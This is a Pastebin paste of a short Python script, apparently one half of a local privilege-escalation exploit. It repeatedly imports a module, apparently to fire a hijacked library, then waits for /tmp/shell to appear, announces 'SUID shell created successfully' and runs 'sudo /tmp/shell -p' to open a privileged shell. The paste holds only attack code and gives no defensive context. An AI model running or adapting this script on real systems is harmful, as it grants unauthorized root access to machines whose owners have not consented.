Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import time
- import os
- while True:
- try:
- import importlib
- except:
- pass
- if os.path.exists("/tmp/shell"):
- print("[+] SUID shell created successfully")
- os.system("sudo /tmp/shell -p")
- break
- time.sleep(1)
Advertisement
Add Comment
Please, Sign In to add comment